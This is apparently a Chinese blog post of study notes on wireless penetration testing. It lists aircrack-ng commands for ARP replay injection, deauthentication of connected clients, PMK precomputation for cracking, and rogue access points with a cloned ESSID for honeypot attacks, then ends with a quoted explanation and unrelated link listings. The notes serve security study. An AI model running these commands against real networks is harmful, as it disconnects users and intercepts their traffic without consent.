重新记一遍 ,在捕获握手数据包的时候不容易获取,所以使用ARP请求。使用自己的无线网卡的地址发送请求,会容易使得无线开启端掉线,迫使重新连接。

1、使用命令   aireplay-ng -3 -b aa:aa:aa:aa:aa:aa -h 目标无线MAC地址  wlanmon   其中-3表示使用APR请求

2、如何攻击加速捕获数据包的速度   使用命令   aireplay-ng --deauth 1 -a  目标MAC地址 wanmon

打开刚才捕获的数据包

3、使用工具 genpkm工具生成PKM  可以加速破解

4、查看捕获的数据包的内容

5、创建一个相同名字也就是ESSID的 无线接入点    使用命令  airbase-ng -a  创建的MAC地址(随便填一个) --essid  要模拟的无线SSID  wlanmon

使用命令 airodump-ng wlan0mon    查看刚才新生成的 无线接入点的SSID  yaming

对要破解的无线网络接入点 实时宏发范攻击迫使连接的客户端掉线。连接到自己的设置的 无线接入点上。使用命令  aireplay --deauth 0 -a 攻击目标主机无线的MAC地址 wlanmon

可以随机生成一个MAC地址的无线接入点   使用命令 airbase-ng --essid Rogue(ESSID) -c 11 wlan0mon

6、首先看看无线蜜罐攻击描述

A hacker may do either of two things:
1. Silently monitor the probe and bring up a fake access point with the same ESSID the
client is searching for. This will cause the client to connect to the hacker machine,
thinking it is the legitimate network.
2. He may create fake access points with the same ESSID as neighboring ones to
confuse the user to connect to him. Such attacks are very easy to conduct in coffee
shops and airports where a user might be looking to connect to a Wi-Fi connection.
These attacks are called Honeypot attacks, which happen due to Mis-Association to the
hacker's access point thinking it is the legitimate one.

int this here  we will do this exercise

wireless Penetration Testing & Honeypot and Mis-Association attacks的更多相关文章

  1. Penetration testing _internal & wireless Penetration Testing

    第一部分 渗透测试步骤 ---参考资料  Ethical Hacking: The Value of Controlled Penetration Tests  下载地址  链接:https://pa ...

  2. Wireless Penetration Testing(7-11 chapter)

    1.AP-less WPA-Personal cracking 创建一个honeypoint  等待链接,特点在于不需要攻击致使链接的客户端掉线,直接获取了流量的握手包. 2.Man-in-the-M ...

  3. Wireless Penetration Testing(命令总结)

    1.对本书出现的无线网络涉及的命令做一总结 查看无线网卡( Create a monitor mode interface using your card as shown in the follow ...

  4. 14 Live CDs for Penetration Testing (Pen Test) and Forensic

    http://www.ivizsecurity.com/blog/penetration-testing/live-cd-penetration-testing-pen/ Yesterday I wa ...

  5. Web Application Penetration Testing Local File Inclusion (LFI) Testing Techniques

    Web Application Penetration Testing Local File Inclusion (LFI) Testing Techniques Jan 04, 2017, Vers ...

  6. Penetration Testing、Security Testing、Automation Testing

    相关学习资料 http://www.cnblogs.com/LittleHann/p/3823513.html http://www.cnblogs.com/LittleHann/p/3828927. ...

  7. WEB APPLICATION PENETRATION TESTING NOTES

    此文转载 XXE VALID USE CASE This is a nonmalicious example of how external entities are used: <?xml v ...

  8. Ethical Hacking - NETWORK PENETRATION TESTING(12)

    Post Connection Attacks Sophisticated attacks that can be used after connecting to the target AP. Ga ...

  9. Ethical Hacking - NETWORK PENETRATION TESTING(11)

    Securing your Network From the Above Attacks. Now that we know how to test the security of all known ...

随机推荐

  1. 【.net ajax显示后台返回值】

    1..net ajax显示后台返回值 <script>        $(document).ready(function () {            $("#btn&quo ...

  2. django drf 基础学习1

    一 环境配置    python3.5+ django2.0 pymysql二 安装   /usr/bin/python3 -m pip install django   /usr/bin/pytho ...

  3. android gradle tools 3.X中dependencies, implementation和compile区别

    在3.0版本中,compile 指令被标注为过时方法,而新增了两个依赖指令,一个是implement 和api,这两个都可以进行依赖添加,但是有什么区别呢? api 指令 完全等同于compile指令 ...

  4. Microsoft SQL - 操作语句

    操作语句(Operation Statement) 操作数据库 创建数据库 关键字:create database 用于创建各种数据库对象(数据库.表.触发器.存储过程等) 格式如:create &l ...

  5. Aizu - 2200 Mr. Rito Post Office

    题意:/*你是某个岛国(ACM-ICPC Japan)上的一个苦逼程序员,你有一个当邮递员的好基友利腾桑遇到麻烦了:全岛有一些镇子通过水路和旱路相连,走水路必须要用船,在X处下船了船就停在X处.而且岛 ...

  6. java ==、equals、hashcode有什么区别

    1.== 用来比较两个对象的存储空间 2.equals是Object类提供的方法之一,每个java类都继承Object类,所以每一个对象都具有equals方法,所以在没有覆盖equals方法的情况下, ...

  7. Vivado Turtorial 01 —— 使用vivado中debug功能(类似ISE中ChipScope)

    1.基于BASYS3板子,有如下代码: module top( input clk, input rst, output test_clk ); parameter DIV_CNT = 2; reg ...

  8. caffe调试

    这里说一下关于如何进行Caffe的调试: 参考:https://blog.csdn.net/tsyccnh/article/details/51679121 简要说一下步骤: (1)首先对libcaf ...

  9. BIM平台 http://gzcd.bim001.cn

    BIM平台: http://gzcd.bim001.cn

  10. shell 在手分析服务器日志【转】

    自己的小网站跑在阿里云的 ECS 上面, 偶尔也去分析分析自己网站服务器日志,看看网站的访问量.看看有没有黑阔搞破坏!于是收集,整理一些服务器日志分析命令,大家可以试试! awk '{print $1 ...